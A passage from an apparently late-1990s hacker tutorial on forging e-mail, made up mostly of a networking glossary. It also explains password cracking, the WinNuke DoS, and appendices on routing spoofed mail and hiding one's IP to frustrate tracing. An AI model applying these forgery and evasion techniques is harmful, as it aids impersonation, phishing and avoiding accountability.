what if I'll want to tell my friends about it? Or what if I'll be
surfing from my friend's house or from a public place and I won't
have my bookmarks?
The answer to all of these questions is hostnames.
Hostnames are aliases to IP addresses. A list of hostnames and their
IP addresses is located at InterNIC, which is a database of all
hostnames and their IP addresses.
When you type in a hostname, your computer will look up that
hostname and find the appropriate IP address and then connect to it.
But instead of having to overload InterNIC (imagine that the entire
world will connect to them. This would surely overload their servers
and they will have to spend money on constant upgrades and backups.
And think what will happen if something bad will happen to their
databases...). The solution for this problem is called DNS
servers(17).
11. Finding out what your ISP's mail servers are - there are several
ways to do this:
1) Call your ISP and ask them what is the IP address(9) or the
hostname(10) of your outgoing mail server (this is the IP/hostname
you will need to perform all the tricks in this tutorial). If you
want to know a different ISP's mail server, call their tech support
phone number. But what if they're on the other side of the world and
you don't feel like spending tons of cash simply for calling them
and being put on hold? In this case, try method 3.
2) Start up your mail client, go to your preferences page and find
what it says in the 'outgoing mail' field or in the 'SMTP server'
field (both are the same. SMTP stands for Simple Mail Transfer
Protocl, which is a protocol(18) that is used to send Emails over
the Internet).
3) Guessing. If your target server is someone.com, their mail server
should either be mailgw.someone.com:25 (mailgw.someone.com on
port(2) 25. Note: mailgw stands for mail gateway) or someone.com:25.
If not, send an Email to admin@someone.com or support@someone.com
and ask them what their mail server is (they should be happy to
answer you, unless you tell them that you're an evil hacker or
something. In that case they'll call the cops on you).
Note: not every server on the planet has an outgoing mail server.
12. Portscanner - a program that scans a target for open ports(2) by
trying to connect to it on various ports. The simplest portscanner
will start at port 1 and climbs up, but you can tell more advanced
portscanners to scan a specific range, give you some info on open
ports it might find etc'.
13. Services scanner - a services scanner is much more sophisticated
than a portscanner(12) since it tries to connect on predefined ports
which should have the service(3) you're looking for on them.
14. Root - an account on Unix computers which has maximum
priviledges (read any file, write (and delete) to any file, execute
any file and change other users' permissions). Note: other accounts
may have root access, and the root account may not always have root
access, depending on the sysadmin(22) (but root is the default
account for root access).
15. Bandwidth - the total amount of speed a network connection
device (a modem, a network card, a mail pigeon etc') can get to. For
example: I just bought a new modem. It has a bandwidth of 100Ks per
second, meaning it can transfer up to 100Ks per second.
When you use your network device to do something it will drain some
of the bandwidth in order to do this operation.
16. Client program - a program that connects to a certain
service(3). Most client programs would know how to communicate with
that service with or without the information it will receive from
the daemon banner(4).
Example: an Internet browser (such as Netscape) is a client program
because it connects to port(2) 80, where the webserver daemon(1) is
waiting for connections, and interacts with it in order to retrieve
the file you're looking for. A browser has to know how to
communicate with the webserver daemon (also referred to as HTTPD,
HTTP Daemon. HTTP stands for Hyper Text(23) Transfer Protocol) in
order to fulfill your requests.
17. DNS server - a server that stores hostnames(10) and their IP
addresses(11). Instead of having InterNIC's servers handle the
entire planet, every ISP has a DNS server.
When you type in a hostname and tell your modem to connect to it,
your computer will perform an action called 'DNS Lookup'. In other
words, it will ask your ISP's DNS server what is the appropriate IP
address for the hostname you've typed in. If your ISP's DNS server
will not know the answer, it will ask a higher-level DNS server. If
the higher-level DNS server will not know the answer, it will ask an
even higher-level DNS server, etc' etc' etc'. The highest level is
InterNIC itself.
If the DNS server knew the IP in the first place it would give it to
you. If it didn't (and it only found it out after querying other
servers), it will first add it to his own databases and then give it
to you.
18. Protocol - a set of rules used for computers to interact with
each other over a network of some sort (such as the Internet or a
some kind of a local network) they need to know a common protocol
and each computer has to assume that the other one knows this
protocol and uses it.
19. Telnet - a program that in it's most simplicity allows you to
form a text-based connection between your computer and another
computer over a network of some sort. You may choose the IP
address(9) or hostname(10) and the port(2) you wish to contact, and
Telnet will establish a TCP(6) connection between both machines.
Note about the Telnet daemon(1): the Telnet daemon is completely
different. It waits for incoming TCP(6) or UDP(7) connections on
port 23 and then asks the user for a login (often called a username)
and a password (unless the user typed in an unpassworded username.
In that case, he will get in without entering a password.
Unpassworded accounts are often VERY limited) and then proceed to
execute a program (usually a command interpreter(20)) and giving you
some permissions, all depending on the username and the password you
have entered (unless you gave in the wrong details. In that case,
you will be told that either the username or the password are wrong
and be given another try. Most systems give you three tries and then
quit).
20. Command interpreter - a program that accepts commands from the
user and turns them into real commands your computer understands.
For example: if your command interpreter contains a command called,
say, display, which accepts a single parameter which should be a
filename, and you type in 'display somefile' (without the quotes,
and replace somefile with a real filename) then it will translate
this command into 'okay mr. computer, find the hard drive by doing
this and this, go to the FAT (File Allocation Table) and find out in
which sector/sectors this file is located, grab the file and send it
to the terminal device (the specified output device, usually your
monitor)'. Get the main idea?
21. Shell account - an account on a remote computer (a username and
a password and a bunch of personal configuration files and stuff).
Having a shell account on a remote computer means having the ability
to telnet(19) into that computer on port 23, type in your account's
login (also referred to as a username) and password and getting a
command interpreter(20) with some permissions (depending on the
sysadmin(22)).
22. Sysadmin / admin - the man/woman/furry creature who is in charge
of a system.
23. Hyper Text - if you've ever seen an HTML document you should
know what hyper text is, but you might not be aware of it. HTML
stands for Hyper Text Markup Language. Hyper text is considered as
"enhanced text", since you can add pictures, colors, links
etc' to it. Compare that to the regular and dull text format which
this tutorial uses... :D
24. RFC - stands for Request For Comment. These are draft papers by
the IETF (Internet Engineering Task Force - those guys who set all
those Internet standards and stuff). They contain suggestions for
Internet standards.
You can search for RFCs at http://www.linuxberg.com.
25. InterNIC - the domain registration database and the highest
DNS(17) server on the planet.
26. Sub domain - first class domains look like this: something.com
(or other extensions, such as org, net, cc, co.uk etc'). It costs
70$ to register one (see http://www.networksolutions.com). Second
class domains look like this: someone.something.com and they cost 0$
to register, if you already have something.com registered to you, of
course (although you can get those for free on websites such as
www.anrki.com). Third class domains look like this:
blah.someone.something.com and they don't cost any money either,
etc' etc' etc'.
Note about the price of a first-class domain: this price does not
include web hosting (someone who will host your website or whatever
you want to put up on his server).
27. SSH - stands for Secure Shell. This daemon(2) waits for incoming
TCP(6) or UDP(7) connections on port 22. Once you connect to it, you
will be asked for a Login and a Password, just like the Telnet
daemon(19) does, only SSH encrypts everything for increased
security.
28. Moderated mailing list / message board - I'll explain this by
giving you an example. BugTraq (see http://www.securityfocus.com) is
one of the best security-related mailing list. Although people can
"send things to the list" (meaning send an Email message
and have it sent to all the members of the mailing list), you can't
just send everything. Aleph1, the moderator, goes through all
incoming messages and posts only the good ones.
The same goes with moderated message boards, etc'.
29. DoS attack - DoS stands for Denial of Service (also referred to
as a "nuke" or a "newk"). A DoS attack is some
kind of an attack that causes the target computer to deny some/all
kinds of services to the users of that computer (local and/or remote
users).
For example: Winnuke (also known as OOB), the simplest DoS in the
world.
(Taken from Spikeman's DoS site) This denial of service program
affects Windows clients by sending an "Out of Band"
exception message to port 139, which does not know how to handle it.
This is a standard listening port on Windows operating systems.
Users of Win 3.11, Win95, and
Win NT are vulnerable to this attack. This program is basically a
nuisance program, but it is being widely circulated over the
internet now. It has become a bother in chatrooms and on IRC. By
using your IP# and sending OOB data to port 139, malicious users can
disconnect you from
the net, often leaving you with low resources and the blue tinted
screen. Some of you may have been victims already. If this happens
to you on Win 95, you will see a Windows fatal error message similar
to the following:
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.
This was called from 0028: in VxD NDIS(01) + 00000D7C.
Rebooting the comp should return it to normal state.
Patches ("fixes") For WinNuke (OOB)
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe
(for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.
Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.
More info on DoS attacks can be found at Spikeman's DoS site:
http://www.genocide2600.com/~spikeman/main.html
* I really don't know if this patch will work on newer versions of
Winsock. Therefore I'd like to recommend that you will first
downgrade to Winsock 1.1 (the one that comes with Windows 95) by
going to Control Panel, Network and removing TCP/IP and Dial Up
Adapter(30) and then re-adding them by clicking add, choose protocol
and in the company frame choose Microsoft. Then look for an option
called TCP/IP and double-click it. As for DUN (Dial Up Networking),
do the same but choose adapter instead of protocol.
After you finish downgrading re-upgrade to Winsock 2.0, apply the
patch (Vipup20.exe) and then upgrade to newer versions of Winsock.
30. DUN - stands for Dial Up Adapter. DUN is the program that comes
with Windows and dials to your ISP in case you have a dial-up
account(31).
31. Dial-Up account - a dial-up account at an ISP means that your
modem has to dial some phone number before you can get on the net.
Unlike other ISP accounts (direct cables which keep you online for
24 hours a day), you get a dynamic IP address(9) (and not a static
one like on direct cable connections) since you have to connect and
disconnect instead of just staying online all the time. Every time
you re-connect you are assigned with a different IP address.
32. Packet - a piece of data that travels over a network (such as
the Internet or local/wide area networks). A packet consists of two
main parts: the header and the data itself. The header contains all
sorts of nifty values such as the TTL (Time To Live) and more (you
can read about those in the Modem Speedup section at http://blacksun.box.sk).
The data part contains the actual data that the packet is carrying.
On a regular dial-up account(31), the size of a packet should be 576
bytes (including the header), but on direct cable connections a
packet would be much bigger (again, see Modem Speedup section at
blacksun.box.sk).
33. Unix password files - Every Unix system has a password file.
They contain a list of users, their passwords and some important
information about them. The password file is located at /etc/passwd.
Each line represents a user.
Each line consists of 7 fields, seperated by : marks (commas).
A line in a password file should look like this:
Username:encrypted password:UID:GID:short description:home
directory:shell
Username - the user's username.
Encrypted password - the user's password (encrypted for higher
security). An encrypted password is always 13 characters long.
UID - User ID. Each user has an ID number. If your UID is 0 it means
you have root access(14).
GID - Group ID. You can set groups (for example: all the workers in
the accounting division) and set special permissions to that entire
group. Root has GID 0.
Short description - short description in human language.
Home directory - the directory where all of the user's personal
configuration files are held.
Shell - a program that is executed once the user logs in. In most
cases (and in this case too) the shell is a command interpreter(20).
In our case, the encrypted password field is empty, which means that
the user gets to log in by simply giving a username. This can be
changed after we log in by typing passwd to the command interpreter.
You will then be asked for a password to be set for your account.
Note: on some systems, you have to type passwd your-username instead
of simply typing passwd.
Note 2: root can do passwd your-username and change your-username's
password, no matter who your-username is.
Note 3: if you put any characters that are not of the following
sets: '. / 0-9 a-z A-Z' (without the quotes) or if you don't put
anything in, the account is disabled so that user cannot log in.
This is used when you know you might want to enable this account in
the future.
Cracking the encrypted password
For this you need a password cracker. A password cracker is a
program that takes a certain word out of a dictionary file (also
referred to as a "wordlist") or a combination of letters,
numbers etc' the program makes up systematically ("brute-force
cracking"), encrypts it the way Unix encrypts passwords and
then compares it to the passwords in a given password file. If the
passwords match, it will announce the correct password for that
username.
34. Thread - right now I'm talking about threads in discussion lists
and message boards, not on computer programs. We'll discuss about
these in a later time (maybe).
A thread is a series of posts which started out from a single one.
Let me demonstrate: a person starts a thread by stating a fact or
making an opinion. Then, another person comes into the discussion
list or into the message board and states his opinion on the
subject. Then another person joins in and reply to the replier's
opinion. Then another one comes, but chooses to reply to the
original message instead since he has nothing to say regarding the
other messages (if he does, he can post two messages). You get the
picture...
Appendix A: Fake Daemons(1)
I found these two fake daemons (Sendmail and Telnet(19)) at
packetstorm.securify.com once. They're great to fool attackers and
to play tricks on your friends.
These are Perl (a programming language) programs.
To execute them (no, executing a file doesn't have anything to do
with killing it...) on Unix, simply type ./filename and replace
filename with the name of the file you wish to execute. Every Unix
"flavor", "distribution" or whatever you want to
call it, comes with Perl (I think. Correct me if I'm wrong: barakirs@netvision.net.il).
To execute them under DOS/Windows, you have to download Active Perl
from www.activeperl.com and then simply double click them.
I don't know how to execute them under Mac. I guess Active Perl
supports Macs, but I'm not sure.
Now, on to the fake daemons.
These two daemons came in a single package together with a readme
file. Following are all three files. I did not alter any of those
files, it's up to you to do so. Play with them and learn.
Oh, by the way, if you wish to learn Perl (or any other programming
language), head off to http://blacksun.box.sk and find the books
section.
Enjoy!
== Readme ==
heh.. this piece is no way serious, but if anyone think it would be
cool to
keep working on the piece, drop a line with your ideas. We may
develop it
further. ;-). I basically coded it just for fun, when I had few
spare
minutes.
The piece is supposed to be `want-to-be-Windog-Deception-toolkit'
which
contains sample sendmail.pl and telnetd.pl which are supposed to be
fake
sendmail and telnet daemons. To run this code you will need to
download
and install perl for windoze. (I used active perl from
http://www.activeware.com to test it).
Hope you will have fun with it
C.P.
fygrave@tigerteam.net
Sun May 23 17:12:51 KGST 1999
== End of Readme ==
Appendix B: Routing Mail
You can make your mail go through many different servers in order to
make the header longer and confuse people who would try to track it
down.
Example: if you want to send the fake mail to blah@blah.com, and
route it through blaha.com, blahb.com and blahc.com, then in the
'rcpt to:' part, simply do this: @blaha.com,@blahb.com,@blahc.com:blah@blah.com
Note: this will not work on every Sendmail daemon.
Thanks to Magnus Kristiansen for this one! ;-)
Appendix C: Faking your IP
So you don't want people to find your IP and your hostname when they
look at the full header? Then simply fake your IP!
You can do this by using Wingates or SOCKS firewalls, or telnetting
to the Sendmail daemon from a shell account. If you use either one
of those, the full header will show the Wingate's/SOCKS
firewall's/shell provider's IP address.
If you find a shell account that allows you to telnet out of it, you
can use it to fake your IP. Otherwise, use Wingates or SOCKS
firewalls. To learn more about then, read our Proxy/Wingate/SOCKS
tutorial and our anonymity tutorial at blacksun.box.sk.
Also, we recommend going to the books section on our website and
downloading the excellent item called "IP Spoofing
Demystified". The stuff written in there may not be so
practical, but it is very important reading (you will learn a lot of
important stuff that you could use later).
Appendix D: Reply-to
The Reply-to option does the following: when a person receives an
Email with a reply-to address and sends a reply, the reply is sent
to the address specified within the Reply-to command (this does not
work on really really old Email clients).
To use it, simply insert this line:
Reply-to: some-user@some-server.net
and replace some-user and some-server.net with the appropriate user
and server. You have to include this line before or after the
"Subject:" part.
Appendix E: CC and BCC
CC is used to send a message to other people that are not the
recipients of the message, but might need the information in it.
BCC is used the same way, only people can only see the recipient.
The B in BCC stands for Blind, while the CC stands for Carbon Copy
(like when you copy a page using... nevermind). So BCC stands for
Blind Carbon Copy while CC stands for Carbon Copy. Exciting, isn't
it? Thanks to i2tb for this information.
Want to use CCs and BCCs within your fake Emails? No problem!
They work exactly the same as the Reply-to command in Appendix D.
Simply put CC: or BCC: lines in your fake mail (inside the body of
the message), and then insert the appropriate Email addresses.
References
RFC 821 - the SMTP RFC. Can be found at http://freesoft.org/CIE/RFC/821/index.htm.
Thanks for Chris Karwoski for this one. ;-)
Bibliography
1) Sam Spade's library - http://www.samspade.org.
2) Various online magazines.
3) BugTraq's archives - http://www.securityfocus.com/level2/bottom.html?go=search
4) Packet Storm Security - http://packetstorm.securify.com
5) Security Focus - http://www.securityfocus.com
6) Rootshell - http://www.rootshell.com
7) Hackersclub - http://www.hackersclub.com
|
